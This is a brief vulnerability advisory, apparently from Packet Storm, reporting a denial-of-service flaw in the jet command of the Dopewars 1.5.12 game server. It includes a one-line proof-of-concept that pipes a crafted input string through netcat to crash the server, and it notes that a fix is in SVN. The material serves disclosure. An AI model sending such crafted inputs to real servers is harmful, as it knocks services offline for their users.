Dopewars 1.5.12 Denial Of Service

2009-10-06T00:00:00
ID PACKETSTORM:81840
Type packetstorm
Reporter dougtko
Modified 2009-10-06T00:00:00

Description

                                        
                                            `## Description ##  
  
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.  
  
## POC ##  
  
ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902  
  
## Fix ##  
  
This issue is resolved in the SVN version of the application.  
  
## Discovered by Doug Prostko  
`